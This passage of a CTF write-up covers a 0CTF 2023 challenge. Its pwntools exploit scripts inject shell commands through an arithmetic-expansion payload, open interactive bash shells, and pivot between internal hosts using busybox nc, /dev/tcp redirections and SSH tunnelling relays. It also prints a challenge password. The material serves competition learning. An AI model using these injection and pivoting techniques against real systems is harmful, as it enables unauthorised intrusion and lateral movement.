i2cdump, i2cget, i2cset, id, ifconfig, ifdown, ifup, init, insmod,
ionice, ip, ipcalc, ipneigh, kill, killall, klogd, last, less, link,
linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login,
logname, logread, losetup, ls, lsmod, lsscsi, lzcat, lzma, lzop,
md5sum, mdev, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mknod,
mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mt, mv,
nameif, nc, netstat, nl, nologin, nproc, nsenter, nslookup, nuke, od,
openvt, partprobe, passwd, paste, patch, pidof, ping, ping6,
pivot_root, poweroff, printf, ps, pwd, rdate, readlink, realpath,
reboot, renice, reset, resume, rev, rm, rmdir, rmmod, route, rpm,
rpm2cpio, run-init, run-parts, sed, seq, setkeycodes, setpriv, setsid,
sh, sha1sum, sha256sum, sha512sum, shred, shuf, sleep, sort,
ssl_client, start-stop-daemon, stat, static-sh, strings, stty, su,
sulogin, svc, svok, swapoff, swapon, switch_root, sync, sysctl,
syslogd, tac, tail, tar, taskset, tc, tee, telnet, telnetd, test, tftp,
time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate,
tty, tunctl, ubirename, udhcpc, udhcpd, uevent, umount, uname,
uncompress, unexpand, uniq, unix2dos, unlink, unlzma, unshare, unxz,
unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, w, watch,
watchdog, wc, wget, which, who, whoami, xargs, xxd, xz, xzcat, yes,
zcat
- 显然要ssh连接
second
,但是没有ssh,需要用nc做一个ssh的转发
from pwn import *
from paramiko import *
import socket
proxy_host = "instance.0ctf2023.ctf.0ops.sjtu.cn"
proxy_port = 18081
target_host = "etk98xmjmtkmpwhr"
target_port = 1
io = remote(proxy_host, proxy_port)
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
r = lambda x : io.recvn(x)
ra = lambda x : io.recvall(x)
s = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
ia = lambda : io.interactive()
db = lambda text=None : gdb.attach(io, text)
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
sl(f"CONNECT {target_host}:{target_port} HTTP/1.1\r\nHost: {target_host}\r\n")
sla("Now, write down the exam integrity statement here:","I promise to play fairly and not to cheat. In case of violation, I voluntarily accept punishment")
ru('?\n')
sl('a[$(sh 1>&2)]')
sl('busybox nc second 22')
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 23232))
server.listen(1)
ban=io.recv()
while True:
# 等待客户端连接
client, addr = server.accept()
log.info(f"Accepted connection from {addr[0]}:{addr[1]}")
client.send(ban)
try:
# 在这个地方打断点,防止程序速度过快导致ssh密钥交换失败
while True:
# 接收来自客户端的数据
data =client.recv(10240)
print(data)
# 创建 pwntools 的连接对象
# 发送数据到远程主机
io.send(data)
# print('Recevive From USER' + str(data))
# 接收远程主机的响应
response = io.recv()
print(response)
# 发送响应回给客户端
client.send(response)
# response = io.recv()
# log.info(f"Sent {len(response)} bytes")
except Exception as e:
log.error(f"Error: {e}")
- exp.py from CTFTime
from pwn import *
# nc -X connect -x instance.0ctf2023.ctf.0ops.sjtu.cn:18081 89xergbg93m6vbfj 1
r = remote('instance.0ctf2023.ctf.0ops.sjtu.cn', 18081)
r.send(b'CONNECT hqgbfqxkptyxjmj9:1 HTTP/1.0\r\n\r\n')
r.recvline() # b'HTTP/1.1 200 OK\r\n'
r.recvuntil(b'Now, write down the exam integrity statement here:\n')
r.send(b"I promise to play fairly and not to cheat. In case of violation, I voluntarily accept punishment\n")
r.recvuntil(b'1 + 1 = ?\n')
r.send(b"a[$(bash -c 'bash -i 1>&2')]\n")
r.recvuntil(b'bash: no job control in this shell\n')
#r.send(b"busybox wget second\n")
#r.recvuntil(b'inet 10.')
r.send(b"busybox nc 10.10.222.5 22\n")
r.recvline() # b'bash-5.1$ busybox nc 10.7.40.5 22\n'
l = listen(2222)
print("ssh ctf@localhost -p2222")
svr = l.wait_for_connection()
svr.connect_both(r)
- flag3, second中busybox没了,使用/dev/tcp直接创建tcp连接
ssh -o ProxyCommand="ssh -p 23231 ctf@localhost 'bash -c \"exec 3<>/dev/tcp/third/22; cat <&3 & cat >&3; kill $\"'" ctf@third
- exp.py from CTFTime
from pwn import *
p = process(['ssh', 'ctf@localhost', '-p2222'])
p.recvline() # Pseudo-terminal will not ...
### DNS because I didnt know /dev/tcp/.../port would look up domains... ###
#from scapy.all import DNS, DNSQR, IP, UDP
#p.send("exec 666<>/dev/udp/127.0.0.11/53\n".encode())
#dns_req = DNS(rd=1337, qd=DNSQR(qname='third'))
#p.send(b"cat <&666 &\n")
#p.send(b"cat >&666\n")
#p.send(dns_req.build())
#print(DNS(p.recv()))
p.send(b"exec 3<>/dev/tcp/third/22\n")
p.send(b"cat <&3 &\n")
p.send(b"cat >&3\n")
l = listen(2223)
print("ssh ctf@localhost -p2223 # pw: x5kdkwjr8exi2bf70y8g80bggd2nuepf")
svr = l.wait_for_connection()
svr.connect_both(p)
- flag4 third 没有 cat
We can use bash to open a file and pipe file content to stdin by doing
... < flag3
, then we can use bash buildinread
to read from stdin into a variable ($line
) and then use bash buildinecho
to write the variable to stdout (fd 1):
- exp.py from CTFTime
from pwn import *
p = process(['ssh', 'ctf@localhost', '-p2223'])
print(p.recvline()) # Pseudo-terminal will not ...
p.send(b"exec 3<>/dev/tcp/fourth/22\n")
p.send(b"""while true; do IFS='' read -d '' -n 1 -r u; if [ "${#u}" -eq 0 ]; then echo -en "\\x00"; fi; echo -n "$u"; done <&3 &\n""")
p.send(b"""while true; do IFS='' read -d '' -n 1 -r u; if [ "${#u}" -eq 0 ]; then echo -en "\\x00"; fi; echo -n "$u"; done >&3\n""")
l = listen(2224)
print("ssh ctf@localhost -p 2224")
svr = l.wait_for_connection()
svr.connect_both(p)